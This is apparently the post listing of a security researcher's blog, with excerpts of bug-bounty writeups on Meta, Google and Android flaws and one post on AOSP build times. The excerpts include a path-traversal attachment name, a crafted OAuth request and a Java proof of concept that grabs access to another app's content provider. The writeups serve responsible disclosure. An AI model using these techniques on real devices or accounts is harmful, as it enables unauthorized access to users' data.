Posts

Featured Post

Remote code execution through a vulnerability in Facebook Messenger for Windows (June 2024)

This short writeup describes a vulnerability found in Facebook Messenger for Windows in June 2024. It was reported during the Meta BountyCon hacking event and helped me climb to 1st place in the results table.

Messenger bug

Meta introduced encrypted chats between Messenger users. It was possible to select a friend and start an encrypted chat with him (similar to what we can do in Telegram: select a user and start an encrypted chat). I played with Messenger for Android, trying to send attachments to a victim on Windows in an encrypted chat. Because the chat is encrypted, everything is verified on the recipient side: the client app must validate all data received from third parties, and we can catch something interesting there.

I sent an attachment with `%2e%2e%5c` symbols and Messenger for Windows placed my attachment at the following path: `C:\Users\vulna\AppData\Local\Messenger\TamStorage\media_bank\AdvancedCrypto\100027775233281\persistent\da7a85eb-aac7-...`

YouTube Music for Android: Like/dislike any video without user confirmation

Hi! Today I would like to post a short tutorial about how your Android app may like/dislike any YouTube video without user confirmation. [last check 14.02.2024]

YouTube Music for Android has an exported PendingIntentReceiver defined in AndroidManifest.xml:

```xml
<receiver android:name="com.google.android.apps.youtube.music.player.widget.base.PendingIntentReceiver" android:exported="true">
  <intent-filter>
    <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_play"/>
    <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_pause"/>
    <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_replay"/>
    <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_retry"/>
    <action android:name=...
```

Meta Quest: Attacker could make any Oculus user follow (subscribe to) him without any approval

Description

The attacker was able to subscribe any Oculus user to the attacker's Oculus account without user approval. So it was possible to make a very attractive account with a lot of real followers without their approval :). These followers are displayed on the Oculus Quest device when you open the user profile, also in the profile opened in Meta Quest for Android and in some other places.

Bug details

This page https://secure.oculus.com/my/people/ displays Oculus user followers:

React debug.keystore key was trusted by Meta (Facebook), which caused Instagram account takeover by malicious apps.

App Signing

All Android applications should be signed with keys generated by app developers ( https://source.android.com/security/apksigning ). When an application is signed with a specific key, we can verify that this app was not modified by a third party. It is also possible to communicate between apps (IPC) and verify an app's identity by its key signature. If the caller app has a verified signature, then we can allow it to do some restricted actions, for example we can return some confidential information to it like user information. These keys should be confidential and not be exposed outside.

Bug Description

I played with the Facebook SDK for Android and noticed one thing. This API call does not validate the package name when you authorize your client_id:

```
https://m.facebook.com/dialog/oauth?android_key= Xo8WBi6jzSxKDVR4drqm84yr9iU &calling_package_key=com.vulnano.android.facebook.sdkat&client_id=124024574287414&display=touch&facebook_sdk_version=8.1.0&redirect_uri=fbconnect%3A%2F%2Fsuc...
```

Facebook Messenger for macOS contained a valid hardcoded FB access token (employee's token?)

In summer I decided to test Facebook Messenger for macOS. I grepped all URLs from the code and started to analyze them. Quickly I noticed a few URLs in the image with an "access_token" value. Cool! Interesting, is this token still valid? I opened https://developers.facebook.com/tools/debug/accesstoken/?access_token= and got confirmation: the token is valid! I stopped experiments and rapidly sent a report to the Facebook Team. All the time before the bounty decision I hoped that this token had some extra internal permissions. Unfortunately for me, it looks like it was just a normal token, probably from a Facebook employee, without any extra access. I think some software developer placed such a link by mistake inside the app and it went out to the whole world)) So, be careful and attentive when you investigate hardcoded data inside apps ;)

Facebook Messenger v. 97.11.116 (97.11.116.283083801) for macOS

- Submitted: 27.07.2021 10:08AM
- Triaged: 27.07.2021 12:36AM
- Fixed: 27.07.2021 12:45AM (token became invalid, may be system...

Global grant URI in Android 8.0-9.0 (2018)

Any third-party application was able to grant itself read/write access to any exported or non-exported, permission-protected content provider installed in the system. It didn't matter whether the content provider was defined in AndroidManifest with the grantUriPermission flag or not, or whether it was exported or not. A third party was able to access any content provider in the system without user interaction.

```java
// Runs inside an Activity of the calling app; uses android.net.Uri and android.content.Intent.
Uri uri = Uri.parse("content://com.whatsapp.provider.media/item/5");
Intent intent = new Intent(Intent.ACTION_MAIN);
// Target the app's own MainActivity, carrying the foreign URI as EXTRA_STREAM
intent.setClassName(getPackageName(), MainActivity.class.getName());
intent.addFlags(Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
intent.putExtra(Intent.EXTRA_STREAM, uri);
intent.setType("*/*");
startActivity(intent);
```

And that's all :) When you launch that code on a vulnerable Android, your app receives access to the passed "uri" value. ...

AOSP build time on Ryzen 9 3900x

Maybe somebody is thinking of building their own build machine for Android. At the end of 2019 I bought the following desktop PC:

Hardware:

- AMD Ryzen 9 3900X
- Gigabyte X570 Aorus Elite
- HyperX Predator 2x16GB DDR4 PC4-25600 HX432C16PB3K2/32
- Gigabyte Aorus NVMe Gen4 1TB GP-ASM2NE6100TTTD
- Palit GeForce GT 1030 2GB DDR4

OS: Ubuntu 18.04.3

And here are some of the build time logs:

- RAM: 2400mhz, make -j12: `#### build completed successfully (54:13 (mm:ss)) ####`
- RAM: 2400mhz, -j18: `#### build completed successfully (46:52 (mm:ss)) ####`
- RAM: 2400mhz, make -j24: `#### build completed successfully (43:14 (mm:ss)) ####`
- RAM: 3200mhz, -j24: `#### build completed successfully (41:55 (mm:ss)) ####`

Branch with tag android-10.0.0_r_xx (don't remember the Android tag name).